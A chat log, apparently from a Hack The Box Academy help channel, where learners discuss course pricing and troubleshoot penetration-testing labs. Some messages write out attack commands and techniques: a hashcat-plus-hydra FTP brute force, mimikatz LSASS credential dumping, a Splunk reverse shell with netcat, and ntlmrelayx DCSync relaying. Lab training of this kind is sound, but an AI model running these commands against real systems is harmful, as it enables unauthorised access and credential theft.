Are you running it with python2?

No videos

i dont know

That specific path no. But there is another one called security analysis certification which is defensive

Does that specific path only teach offensive?

And is it for free?

i have both install i think

yes CPTS path(penetration tester) only teaches you offesnive.
no its not for free
https://academy.hackthebox.com/paths/jobrole
you need cubes to buy the needed modules to complete it, i think one plat and one gold should be enough?
or if you have EDU email(from uni) its like 8€ per month

plus then the exam voucher which is around 200€?

Thanks it works! didn`t expect that tcp works better for rdp connection

hey, last question, sorry for bothering. When should I start with the Starting Point in labs?

Am I intended to do some specific modules from the academy? Or can I do them alongside the pentest job path?

i tried telling you this a few hours ago
#modules message

https://tenor.com/view/didnt-read-gif-5176665

sorry my fault

you mean pro labs/endgame?
usually ppl do them before they do the exam, so after they did majority if not all of the modules

no, I mean:

just do it

if you don't understand/can't do it, come back later

ok, cool, so I can start right away with it

thanks!

thats not needed to progress in the module, sure if you want to learn a bit more you can do it, i personally didnt even know it existed lol

htb changed from the last time i was active 😦 i remember you needed to hackyourself the invite link or whatver it was

same

it was cool

then did as many to get to hacker rank then life got busy, untill now, on monday the interviewers i had an interview by them gonna call me again sadly nothing cyber related but if its my first job im takking it

Good luck 🍀

frfr i remember i had the correct mindset there but because of lack of knowlede i couldnt get the last thing to work so had to watch a yt video on how to get in

tyty should be something like cloud eng, still interesting

if u want to make malware then go to maldevacademy

oh yaeh same

didn't know what I was doing back then

yea lol then remember some easy boxes i was stuck because the only "really" thing you could learn was from ippsec. dude was/is great. i remember being stuck for more then a few weeks on an active easy box. did it at the end lol. had such a great time. ngl from what i remember and from what the academy cpts path coveres in beginning you should be able to solve 99% of easy boxes

everything i remember is covered in the footpriting

will soon be more active on the boxes again once i buy myself a new computer

Password Attacks Hard Lab

||i have the B......vhd, i tried to mount it via guestmount, but it wants a passphrase, im stuck here for some while, i tried bitlocker2john but i cant get a hash out of it, am i even on the right path?||

yeah lmao easy boxes seemed impossible back then

good times

Yea hahaha i remembered the friendzone one. Bunch of dns enumerating iirc. Had nooo clue what i was doing. Or some other one, random exploit go brrrrr, didnt even know what those exploits did

Hello

Running with python2?

no the binary from bitlocker2john

hi. if i buy " HTB Certified Web Exploitation Expert " exam ticket, i have the full course to prepare for the exam as well?

#modules message
I was referencing this messege which marcie answered.
Sadly i havent done it yet since i got ill and im right before it...

You first need to do all the needed modules. The exam ticket doesnt give you access to those modules. Its seperate

so it's only exam ticket

how can i prepare to get that certification?

You do the path

are you talking about " Bug Bounty Hunter " and " Senior Web Penetration Tester " path?

.

applies to both

if you want to get CWEE, do Senior Web Penetration Teste

aah ok thank you. i'm a cybersecurity student (i have the email from my university) and after the membership i can't take for free " Senior Web Penetration Tester "

i'am forced to buy a lot of cubes and spend a lot of money to get this path?

Only t0 are free

Everything else costs cubes, you either buy gold or platium or other monthly sub to get cubes

But if you have the edu email, you can get to t2 i think all modules for 8€ per.month

yes , i'm already a premium member

i can access to every module and pentesting path but no Senior Web Penetration Tester

i cheked for the price and is really expensive to buy cubes

1000$ / year only to get Senior Web Penetration Tester

You have to buy T3 and T4 modules with cubes or buy the Gold annual subscription

I think it's wrong for a student that want to improve own skills. It's really expensive

It is much cheaper to buy 6000 cubes with the Platinum subscription

but no problem, it's just my opinion

i like htb and how it works

Ima try it out

And it is still much cheaper than, for example, OffSec

Its not wrong lol? If you want to learn harder stuff be prepared to pay.more

i know but offsec certifications are a must to get a job as a pentester

i mean for the companies

htb certifications are not required . it's only knowledge

Idk about a must

Htb cert is fairly new unlike oscp example which is already in the industry a long time. Cpts will teach you more and the modules are far better refined then the oscp ones.
But id guess its not standart yet since its fairly new

yes , i like htb

Amd oscp cost 1500-2500 while htb costs
250-500€

i know but for the companies if you want to be a pentester , you need to have the oscp cert . until some months ago it was just an asset but is a must right now

afterwards i like htb , it was just for the expensive price of that module

That’s a limiting belief

you get access to 70 modules and that's not enought?

more advanced module costs more money, it's simple as that

it's enough, i just claimed that price for the Senior Web Penetration Tester is really expensive and should have been cheaper

Have you taken it?

but it's ok. as i told you before i really like htb and the modules are better than offsec

it's cheap compared to other certs at a similar level

Its called senior and not beginner/intermediate

Id be happy to get a deal like that

i dont even have the python2 version of bitlocker2john

Well i havent done it but maybe just add the pythin2 before the bitwardenjohny2?

Like to run the bitwarden with pythin2 instead of 3

is bitwarden the same as bitlocker?

CROSS-SITE SCRIPTING (XSS) --> Phishing --> document.getElementById('urlform').remove(); is the given example to deface parts of a website but this method does not work. It only seems to add the remove cmd as in plain text on the website.

No

Nope. 2 different things

python2 bitlocker2john.py file

Ah i see the command now hard to try to help withoit knowing thats needed

i dont have the python, just the binary, dont know why

The 2john files are python

file bitlocker2john

ARM aarch64

so no version for my chip?
i tought py is compatible with all archs

probably download the x64 version of john the ripper

amd64 / intel64
not sure if it would run

well that's not a pyton file, it's an ELF, so the architecture matters

are you using arm?

but i have an arm so why downloading amd64?

hey there, I'm new to cybersecurity, I mean basically beginning from scratch with 0 knowledge.
Can anyone tell me which modules to start from

ah

idk then, maybe it doesn't work there

you can use pwnbox

yea ill give it a shot

Information Security Foundations path

alr, thank you so much!

lol also no python one on pwnbox

Hello guys

What Linux distro is stable with HTB lab

any stable distro

yeah just trying running that

took a look at the repo, there's no python version of it

I must have been thinking of a diff 2john file

Just say "works on my machine"

Hi anyone can solved my dude? I'm studying the module "Password Attack" and I'm doing the labs, so, I finished the medium lab, but I don't understand, why do work this solution? Is work because the root made this file?

can someone give me another hint for the easy footprinting lab? Is there something I can google like a concept that will get me started finding the answer? I'm doing the lab and I'm stumped as to what to do and need a push in the right direction

I want to solve at least this first easy lab today

thanks

if there's something I can research that will help me figure it out that would be great

did you enumerate which services were open?

services don't always run on standard ports either, so if you're not getting anywhere on any service you enumerated you may need to expand your enumeration of the box with a full port scan.

You have the credentials?

yes but it is blocking ssh connections. do I need to try a different SSH port?

and do I just google how to do that with ssh program?

It doesnt mean they are for ssh

Its maybe for a different service.

ok thanks

I am doing an ACK scan because yesterday my stealth scans were blocked

we'll see what this gets me

There are no blocked scans on footprinting

^

You can DM me if you're struggling

ok I will I'll let you know

gonna try again today to do it myself

Hello guys, Im currently doing the password attacks module and its been getting a bt confusing just need some clarification
are LSA secrets the same as the lsass service cache (which contains hashes for running sessions and services) ?
Also there are numerous ways to dump those hashes remotely and locally however does mimikatz (using sekurlsa::logonpasswords) dump SAM or LSASS or BOTH ?

the sekurlsa::logonpasswords dumps the lsass

https://www.linkedin.com/posts/wilfried-p_explication-super-claire-lsa-vs-lsass-vs-activity-7054499362453774336-W_2u/

thanks guys

google is the most important resource of a pentester 😄

I figured out easy footprinting lab with a little help

thank you @cloud urchin and everyone else who decided to help me

Howdy. I am doing the Password Attacks Module and I am in the Password Mutation Section. I am doing the question " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."

I have been bruteforcing FTP with hydra using 64 threads after making my mutated list thru hashcat.

Yet this has taken me more than 30 m, I have researched and It usually takes ~30m, and I do not want to spend hours on this one question when I can move on.

I ran this command to get my mutated list

 hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

and then ran this in hydra

hydra -l sam -P mut_password.list ftp://10.129.202.64 -T 64 -I -vv

Started at xx:11 PM and its now xx:52 PM

Around 40 min is how long it has taken.

I have not cut the first 19k words in the list liek stated due to me being way to deep into the bruteforce to do so, so any suggestions or advice on how long this can take, or if i did something wrong? Ping me if so here, Thanks

64 tends to be too aggressive for a lot of networks

48 is the sweetspot for many

Ah well yeah, now it gives me errors and need to restart.

I would say without trimming ~30 minutes

How many words should I cut in the mutated list should I do to maximize eficiency, I been here for a min

I think 17k is the common one that's mostly reliable up through most of it (save to a new list name/keep the original mutated list)

Imma remove passwords with less than 10 characters, does that help?

that's the hardest section of the whole module lol

lol my friend had stopped here too

Not sure that's helpful

Because it wasnt working for him

Spent 2 and half hours on it 😂

Lawd

48 threads is safest

Yup

Will try that!

Did you attack ssh?

I did at the start but ik SSH bruteforce is slow as shit

I dont remember if it was ssh or ftp

usually ssh is the slowest right ?

At least you're not trying ssh. Though there is a tool, ssb, that makes ssh bruteforce speedy

Gotcha

But I at least recommend the intended tools first

Yup

Similar philosophy I had with footprinting/services I used a gui email client. Then learned the cli way, which was far more fun to do

Since were here anyone has an easy explanation for what exactly dpapi keys do ? do they just encrypt passwords associated with services and so ?

https://letmegooglethat.com/?q=dpapi+keys

I did the cli way first, then was like hmmm this should be waaaay easier via the gui. 2 clicks and the flag was there

🤣

I know this post is old but I just came here to say thank you. Was driving me nuts. lol

There are times where chatgpt can explain it very good aswell, and if not getting kt you can always tell him " explain it even easier"

https://academy.hackthebox.com/module/113/section/1213 any ideas why the shell is not comming?

triple checked everything and no shell

worked for me

show your reverse shell splunk directory with 'tree'

if the directory structure is setup correctly, you should be able to modify the files with your ip/port info to get the reverse shell, create a tarball, then deploy the payload

Well i created locally that structure, created the files, updated with my ip, create tar, open nc, upload them... no shell

then we would need more detailed information of exactly how you set it up, because the steps outlined in the section definitely work

you're likely missing some configuration setup step

yeah, found the issue 🙂

i named the rev shell as rev.ps1 instead of run.ps1

I don't understand what I'm doing wrong here. I don't know enough to understand the nuances of ' and ` and ", I copied the text straight from the module so I'm very unsure why it's not working.

I haven't done that module, but from the message it looks like your json data is missing some values. I'd try to enumerate the endpoint to see what details are missing and fill those in.

i need help on Skills Assessment - File Upload Attacks, i cant seem a way to bypass the mime type or content type, i already read the upload.php via xxe but no idea comes to mind to bypass it

I'll try that, thank you!

Did the same as you, and didn't face that error - mind copy / pasting what you're executing? I copy / pasted from the module page also and it seemed to work 😕

You can use hexeditor

(by DM)

the upload.php should give you an idea of the naming convention and url format.

dang my box went down just before i got the flag and now i can't get back in even after restarting. can't ping it either.

there we go

THANK YOU

Did you manage.to get past this? I'm,here now

I have tried a fair number of things at this stage and I still get the cert error. Can someone confirm that this exercise is doable?
#modules message tells me we need to run JDK/JVM 11 for this (I'm guessing due to Oracle licensing shenanigans avoidance)
I think that probably wants writing somewhere because it took a fair bit of digging to sort that.

I can't install crackmapexec - I'm getting the following error:

Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.

you could try netexec, which is the successor to cme. https://github.com/Pennyw0rth/NetExec, otherwise it looks like you'd need python3-neo4j. your error says you have broken packages.

I tried installing python3-neo4j - no dice. Thank you for the NetExec suggestion. So essentially that does the same thing?

yes, it's essentially the exact same thing but maintained. same command syntax, same output, everything is the same

Very nice, thanks for your help.

Hi everyone, has anyone had this issue on the Print Spooler & NTLM Relaying module in the SOC Analyst path where impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support throwing an error?

I keep getting the HMAC error: key: expected bytes or bytearray, but got 'int'

anyone else with this problem?

yes, i can't load a vm either

same, I tried to switch to other regions, no luck :/

ah, working now

I just got rick rolled in web attacks

Anybody else having issues connecting via VPN? Keep on erroring out trying to remote desktop into target VM

thats funny af

EU Academy 2 TCP is working fine for me

Could someone help my by explaining the question to me a bit more?
" Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer."
I have done all the other questions for this section, just don't understand what it is asking

This part isn't making much sense to me " customized version of that specific share"

For context this is HTB Academy Footprinting SMB

happy new year all of you guys....

NVM got it. It litterally just wanted what was in the comment section of the SMB listing.

netsharegetinfo sambashare just incase

ohhh

Thanks 🙂 @dry halo . I just ran a listing and got the information haha. But thank you anyway 🙂

NMAP module: it shows "To have a clear view of the SYN scan, we disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping)."
Questions:

1. What does exactly mean a 'clear view of SYN scan'?
   2)In which situations we disable the ICMP echo requests?
2. Same questions above for ARP ping and in which situation I would let ARP ping ON?

1. is there any wireshark screenshots if yes may be to remove unneccesary noise and also maybe on the target
2. when host are configured to not listen to ping requests. Disabling ICMP echo requests can also help avoid detection as some IDS or firewalls may log or block ICMP traffic
3. ARP sometimes can be used for stealth scanning (works in layer2)if ping is blocked we can use this.
   for local network discovery, host detection

Ty

I am tyring to run an SQLi with SOAP and I am getting this error, I used the extension wsdler to have something correct but...https://academy.hackthebox.com/module/160/section/1475

Getting same prolem as default :

I found the problem by comparing with forums etc.

Hi htb dudes do you know what's the password of the attacking machine htb academy ?

In the Using Crackmapexec course, Targets and Protocols section, the last question is "What's the full name of the smb module that starts with zero? " I feel like I am missing something obvious here, I have looked for both 0 and zero but I cannot figure out this question...

Hi htb dudes do you know what's the password of the attacking machine htb academy ?

When you initially log in, you will be notified of these credentials

I did not get this? I just press start button and machine came out?

Do you know the password of that instance ?

Not that one. The attack machine that's the target machine ?

If there are no creds, you don't need any

you mean the pwnbox?

The creds are on the Desktop

Humm I would like to connect from my target machine to my attack machine through rdp? Why rdp asking for password?

Yes pawnbox

Why do you want to access the PwnBox with RDP?
Use either the PwnBox in the browser or your own VM with VPN

An additional machine in between only makes the lab unnecessarily slow

And why htb target machine keeps timing out my remote session. Humm they should have to fix this. 🙄

Why not providing all in one platform ? Hays

Paid for 500usd and service is not fully provided hayys🙄

There can be various reasons for this.
It could be due to the HTB server, it could be due to your network, but it could also be somewhere in between
Contact support so that this can be investigated

The PwnBox in the browser is an all-in-one platform solution

Reach out to supoort

Okay thanks for your time. Hope they action users complain.. 🙏 thinking to move to tryhackme. But not sure if their service is more better than htb.

htb 🔛🔝

As already mentioned, performance depends on many factors

htb is more betterer

No it's not. Why need to use another vm ? Why they don't add more vms ?

You don‘t need your own VM. You can use PwnBox

it's provided

Use either the PwnBox or your own VM with your tools, settings, etc

Does it cost money to them? If yes there subscription is expensive. Why they don't spend that money to make a better platform. So that user will be satisfied.

The PwnBox is included in the modules

You can also use your own VM free of charge. It just depends on your setting

VirtualBox is free of charge. Parallels on Mac costs a license fee.
It depends on what you can and want to use

But that has nothing to do with HTB.

Dude I was asking to rdp to my pawnbox from may target machine. But it won't let me because rdp is obviously needed to enter a password credentials to be able to establish a remote connection.
Did you get that?

Hi guys! I have a question from a module. It's theory-wise

" Workstations should be on their own network, and in a perfect world, each workstation should have a Host-Based Firewall rule preventing it from talking to other workstations. "

Isn't such a firewall rule interfering with the normal work if the workstations cannot communicate between themselves? If I want to send something to my colleague (a file for ex)... can I do it with such a rule?

Bro, why do you want to establish an RDP connection to your PwnBox? That makes no sense.
Either use the PwnBox in the browser or use your own VM.

the credentials are literally provided.
did you get that?

Lol you guys don't get what I mean.

there's no need to rdp to pwnbox, it's in your browser

Dude I want to share drive from my windows target machine to my pawnbox. Isn't that clear?